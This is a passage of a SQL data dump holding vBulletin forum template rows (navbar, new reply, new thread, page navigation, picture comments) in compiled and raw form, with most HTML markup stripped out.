(1447, -1, 'modifyusergroups_requesttojoin', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[request_to_join_group]: $usergroup[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[join_request] \r\n \r\n \r\n $vbphrase[reason_for_request] \r\n \r\n \r\n \r\n $vbphrase[request_reason]:
\r\n
\r\n \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[request_to_join_x__moderated_by_leaders]\", \"$usergroup[title]\") . \":
\r\n $groupleaders
\r\n \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[request_to_join_group]: $usergroup[title] \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[join_request] \r\n \r\n \r\n $vbphrase[reason_for_request] \r\n \r\n \r\n \r\n $vbphrase[request_reason]:
\r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[request_to_join_x__moderated_by_leaders] :
\r\n $groupleaders
\r\n \r\n \r\n
\r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208876305, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1448, -1, 'modifyuserlist_confirm', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n ', 'template', 1208880910, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1449, -1, 'modifyuserlist_headinclude', '', '', 'template', 1216986311, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1450, -1, 'navbar', ' \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'registerbutton\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n $template_hook[navbar_buttons_left]\r\n \r\n \".(($show[\'communitylink\'] AND $show[\'popups\']) ? (\"\r\n \r\n \") : (\"\r\n \".(($show[\'memberslist\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'quick_links_groups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n \".(($show[\'popups\']) ? (\"\r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \") : (\"\r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \")).\"\r\n $template_hook[navbar_buttons_right]\r\n \".(($show[\'member\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n
\r\n\r\n\r\n \r\n\r\n\".(($show[\'notices\']) ? (\"\r\n\r\n \r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n $vbphrase[notices] \r\n \r\n \r\n \r\n $notices\r\n \r\n \r\n
\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'forumdesc\']) ? (\"\r\n \r\n \r\n $foruminfo[title] $foruminfo[description] \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\r\n \".(($show[\'communitylink\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'searchbuttons\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \r\n \".(($show[\'member\']) ? (\"\r\n \r\n \r\n \r\n\r\n \") : (\"\")).\"\r\n\r\n\r\n\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'member\'] AND $notifications_total) ? (\"\r\n\r\n\r\n\r\n\") : (\"\")).\"\r\n\r\n$ad_location[ad_navbar_below]', ' \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_buttons_left]\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $template_hook[navbar_buttons_right]\r\n \r\n \r\n \r\n \r\n
\r\n
\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[notices] \r\n \r\n \r\n \r\n $notices\r\n \r\n \r\n
\r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $foruminfo[title] $foruminfo[description] \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n$ad_location[ad_navbar_below]', 'template', 1267771772, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1451, -1, 'navbar_link', '\".(($show[\'breadcrumb\']) ? (\"\r\n > $nav_title \r\n\") : (\"\r\n $nav_title\r\n\")).\"\r\n', '\r\n > $nav_title \r\n \r\n $nav_title\r\n \r\n', 'template', 1070543944, 'vBulletin Solutions', '', 'vbulletin'),
(1452, -1, 'navbar_noticebit', '\r\n \".(($show[dismiss_link]) ? (\" \") : (\"\")).\"$notice_html\r\n
', '\r\n $notice_html\r\n
', 'template', 1231172935, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1453, -1, 'navbar_notifications_menubit', '\r\n \r\n \r\n ', '\r\n \r\n \r\n ', 'template', 1203615317, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1454, -1, 'newattachment', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vbphrase[manage_attachments] - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vbphrase[manage_attachments] - $vboptions[bbtitle] \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n', 'template', 1208876362, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1455, -1, 'newattachmentbit', '\r\n session->vars[\'sessionurl\'] . \"attachmentid=$attach[attachmentid]&stc=1&d=$attach[dateline]\\\" target=\\\"_blank\\\">$attach[filename] ($attach[filesize]) \r\n \r\n ', '\r\n $attach[filename] ($attach[filesize]) \r\n \r\n ', 'template', 1105654221, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1456, -1, 'newattachment_errormessage', '\r\n \r\n $filename : \r\n $errormessage\r\n
\r\n \r\n', '\r\n \r\n $filename : \r\n $errormessage\r\n
\r\n \r\n', 'template', 1069935876, 'vBulletin Solutions', '', 'vbulletin'),
(1457, -1, 'newattachment_keybit', '\r\n $extension[extension] \r\n $extension[size] \r\n $extension[width] \r\n $extension[height] \r\n ', '\r\n $extension[extension] \r\n $extension[size] \r\n $extension[width] \r\n $extension[height] \r\n ', 'template', 1116009176, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1458, -1, 'newpoll', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_a_poll] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n\r\n\r\n\r\n$pollpreview\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[post_a_poll] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n\r\n\r\n\r\n$pollpreview\r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876374, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1459, -1, 'newpost_attachment', '\r\n $vbphrase[attach_files] \r\n \r\n
\r\n
$vbphrase[valid_file_extensions]: \" . $GLOBALS[\'vbulletin\']->userinfo[\'attachmentextensions\'] . \"
\r\n
\r\n
\r\n \".(($show[\'attachmentlist\']) ? (\"\r\n $attachments\r\n \") : (\"\")).\"\r\n
\r\n
\r\n
\r\n ', '\r\n $vbphrase[attach_files] \r\n \r\n
\r\n
$vbphrase[valid_file_extensions]: $bbuserinfo[attachmentextensions]
\r\n
\r\n
\r\n \r\n $attachments\r\n \r\n
\r\n
\r\n
\r\n ', 'template', 1148414393, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1460, -1, 'newpost_attachmentbit', '', '', 'template', 1126014989, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1461, -1, 'newpost_disablesmiliesoption', ' $vbphrase[disable_smilies_in_text]
\r\n', ' $vbphrase[disable_smilies_in_text]
\r\n', 'template', 1070081482, 'vBulletin Solutions', '', 'vbulletin'),
(1462, -1, 'newpost_errormessage', '$errormessage ', '$errormessage ', 'template', 1069263001, 'vBulletin Solutions', '', 'vbulletin'),
(1463, -1, 'newpost_preview', '\r\n\r\n\r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n $vbphrase[errors_occured_when_submitted]:\r\n \") : (\"\r\n $vbphrase[preview]\r\n \")).\"\r\n \r\n \r\n\r\n \r\n \".(($show[\'errors\']) ? (\"\r\n \r\n $errorlist \r\n \r\n \") : (\"\r\n\r\n \".(($show[\'messageicon\'] OR $newpost[\'title\']) ? (\"\r\n \r\n \r\n \".(($show[\'messageicon\']) ? (\"
\") : (\"\")).\"\r\n \".(($newpost[\'title\']) ? (\"
$newpost[title] \") : (\"\")).\"\r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n $previewmessage\r\n\r\n \".(($show[\'attachments\']) ? (\"\r\n \r\n \r\n\r\n \".(($show[\'thumbnailattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'imageattachmentlink\']) ? (\"\r\n
\r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'otherattachment\']) ? (\"\r\n
\r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'moderatedattachment\']) ? (\"\r\n
\r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'signature\']) ? (\"\r\n __________________ \r\n $post[signature]
\r\n \") : (\"\")).\"\r\n \")).\"\r\n \r\n \r\n
\r\n\r\n ', '\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[errors_occured_when_submitted]:\r\n \r\n $vbphrase[preview]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n $errorlist \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n
$newpost[title] \r\n
\r\n \r\n \r\n \r\n $previewmessage\r\n\r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_thumbnails] \r\n \r\n $post[thumbnailattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_images] \r\n \r\n $post[imageattachmentlinks]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attached_files] \r\n \r\n $post[otherattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[attachments_pending_approval] \r\n \r\n $post[moderatedattachments]\r\n
\r\n \r\n \r\n\r\n
\r\n \r\n \r\n\r\n \r\n __________________ \r\n $post[signature]
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n ', 'template', 1219766939, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1464, -1, 'newpost_quote', '[QUOTE=$originalposter]{$pagetext}[/QUOTE]\r\n', '[QUOTE=$originalposter]{$pagetext}[/QUOTE]\r\n', 'template', 1069263046, 'vBulletin Solutions', '', 'vbulletin'),
(1465, -1, 'newpost_threadmanage', '\r\n $vbphrase[thread_management] \r\n \r\n ', '\r\n $vbphrase[thread_management] \r\n \r\n ', 'template', 1117066459, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1466, -1, 'newpost_usernamecode', '\".(($show[\'member\']) ? (\"\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[logged_in_as_x]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=\" . $GLOBALS[\'vbulletin\']->userinfo[\'userid\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \"\") . \"\r\n
\r\n\") : (\"\r\n \r\n\")).\"', '\r\n \r\n \r\n
$vbphrase[logged_in_as_x] \r\n
\r\n \r\n \r\n ', 'template', 1203523683, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1467, -1, 'newreply', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[reply_to_topic] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
\r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n \".(($show[\'subscribefolders\']) ? (\"$vbphrase[folder]:$folderbits \") : (\"\")).\"\r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'threadrating\']) ? (\"\r\n
\r\n $vbphrase[rate_thread] \r\n \r\n
$vbphrase[can_add_a_score_for_thread]
\r\n
\r\n \r\n $vbphrase[choose_a_rating] \r\n \r\n 5 : $vbphrase[excellent] \r\n 4 : $vbphrase[good] \r\n 3 : $vbphrase[average] \r\n 2 : $vbphrase[bad] \r\n 1 : $vbphrase[terrible] \r\n \r\n \r\n
\r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[topic_review_newest_first]\r\n \r\n \r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n\r\n\r\n
\r\n\r\n $threadreviewbits\r\n\r\n \".(($show[\'reviewmore\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n\r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[reply_to_topic] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(0, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \r\n\r\n $attachmentoption\r\n\r\n
\r\n \r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n $vbphrase[folder]:$folderbits \r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[rate_thread] \r\n \r\n
$vbphrase[can_add_a_score_for_thread]
\r\n
\r\n \r\n $vbphrase[choose_a_rating] \r\n \r\n 5 : $vbphrase[excellent] \r\n 4 : $vbphrase[good] \r\n 3 : $vbphrase[average] \r\n 2 : $vbphrase[bad] \r\n 1 : $vbphrase[terrible] \r\n \r\n \r\n
\r\n
\r\n \r\n \r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[topic_review_newest_first]\r\n \r\n \r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n\r\n\r\n
\r\n\r\n $threadreviewbits\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n\r\n$spacer_close\r\n$spacer_open\r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1210684936, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1468, -1, 'newreply_reviewbit', '\r\n $postdate $posttime \r\n \r\n\r\n $username \r\n \r\n \".(($reviewtitle) ? (\"$reviewtitle
\") : (\"\")).\"\r\n $reviewmessage\r\n \r\n ', '\r\n $postdate $posttime \r\n \r\n$vbphrase[post_x]\" valign=\"top\">\r\n $username \r\n \r\n $reviewtitle
\r\n $reviewmessage\r\n \r\n ', 'template', 1205156423, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'),
(1469, -1, 'newreply_reviewbit_ignore', '$vbphrase[this_user_on_your_ignore_list]', '$vbphrase[this_user_on_your_ignore_list]', 'template', 1070145199, 'vBulletin Solutions', '', 'vbulletin'),
(1470, -1, 'newreply_reviewbit_ignore_global', '\" . construct_phrase(\"$vbphrase[administrator_decided_x_quiet]\", \"$post[username]\") . \"', '$vbphrase[administrator_decided_x_quiet] ', 'template', 1070145286, 'vBulletin Solutions', '', 'vbulletin'),
(1471, -1, 'newthread', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[post_new_thread] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\noptions[\'postminchars\'] . \")\\\"\") : (\"\")).\">\r\n\r\n\r\n\r\n\".(($show[\'additional_options\']) ? (\"\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($show[\'podcasturl\']) ? (\"\r\n \r\n
\r\n $vbphrase[podcast_options] \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'misc_options\']) ? (\"\r\n
\r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $attachmentoption\r\n\r\n \".(($show[\'member\']) ? (\"\r\n
\r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n \".(($show[\'subscribefolders\']) ? (\"$vbphrase[folder]:$folderbits \") : (\"\")).\"\r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'poll\']) ? (\"\r\n
\r\n $vbphrase[post_a_poll] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[post_new_thread] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n$postpreview\r\n\r\n onsubmit=\"return vB_Editor[\'$editorid\'].prepare_submit(this.subject.value, $vboptions[postminchars])\">\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[additional_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[podcast_options] \r\n\r\n \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[miscellaneous_options] \r\n \r\n \r\n \r\n\r\n $attachmentoption\r\n\r\n
\r\n \r\n $vbphrase[thread_subscription] \r\n \r\n \r\n $vbphrase[notification_type]:\r\n $vbphrase[do_not_subscribe] \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n $vbphrase[folder]:$folderbits \r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[post_a_poll] \r\n \r\n \r\n \r\n\r\n $threadmanagement\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n \r\n\r\n$forumrules\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1222256788, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1472, -1, 'pagenav', '\r\n
\r\n\r\n \r\n \".(($show[\'first\']) ? (\"« $vbphrase[pagenav_first] \") : (\"\")).\"\r\n \".(($show[\'prev\']) ? (\"< \") : (\"\")).\"\r\n $pagenav\r\n \".(($show[\'next\']) ? (\"> \") : (\"\")).\"\r\n \".(($show[\'last\']) ? (\"$vbphrase[pagenav_last] » \") : (\"\")).\"\r\n \".(($show[\'popups\']) ? (\"\") : (\"\")).\"\r\n \r\n
\r\n
', '', 'template', 1249925804, 'vBulletin Solutions', '3.8.4', 'vbulletin'),
(1473, -1, 'pagenav_curpage', ' $curpage \r\n ', ' $vbphrase[showing_results_x_to_y_of_z]\">$curpage \r\n ', 'template', 1070082250, 'vBulletin Solutions', '', 'vbulletin'),
(1474, -1, 'pagenav_pagelink', '$curpage ', '&page=$curpage#$anchor \" title=\"$vbphrase[show_results_x_to_y_of_z] \">$curpage ', 'template', 1194866578, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1475, -1, 'pagenav_pagelinkrel', '$curpage ', '&page=$curpage#$anchor \" title=\"$vbphrase[show_results_x_to_y_of_z] \">$curpage ', 'template', 1194866600, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1476, -1, 'picturecomment_commentarea', '\".(($picturecomment_form OR $picturecommentbits) ? (\"\r\n \r\n\r\n\r\n \".(($picturecommentbits) ? (\"\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[showing_pcs_x_to_y_of_z]\", \"$messagestats[start]\", \"$messagestats[end]\", \"$messagestats[total]\") . \"\r\n
\r\n\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($picturecomment_form) ? (\"\r\n
$vbphrase[post_comment]
\r\n $picturecomment_form\r\n \") : (\"\")).\"\r\n\r\n
\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'edit\'] AND $show[\'popups\']) ? (\"\r\n\r\n \r\n\r\n\") : (\"\")).\"', '\r\n \r\n\r\n\r\n
\r\n \r\n
\r\n
$vbphrase[showing_pcs_x_to_y_of_z] \r\n
\r\n\r\n \r\n \r\n \r\n\r\n
\r\n first_row\">$vbphrase[post_comment]
\r\n $picturecomment_form\r\n \r\n\r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n ', 'template', 1218204843, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1477, -1, 'picturecomment_css', '', '', 'template', 1203537558, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1478, -1, 'picturecomment_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[delete_messages] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_messages] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n \") : (\"\")).\"\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
\r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removemessages\']) ? (\"\r\n
\r\n $vbphrase[physically_remove] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n
\" . construct_phrase(\"$vbphrase[deleting_x_messages_from_y_pictures]\", \"$messagecount\", \"$picturecount\") . \"
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[delete_messages] \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_messages] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n
\r\n $vbphrase[how_would_you_like_to_delete]
\r\n \r\n
\r\n \r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[physically_remove] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \r\n
\r\n \r\n\r\n
$vbphrase[deleting_x_messages_from_y_pictures] \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876422, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1479, -1, 'picturecomment_editor', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\".(($show[\'delete\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n $vbphrase[delete_message]\r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
$vbphrase[delete_message_check_appropriate_option]
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \r\n\r\n
\r\n
$vbphrase[reason_for_deletion]:
\r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n
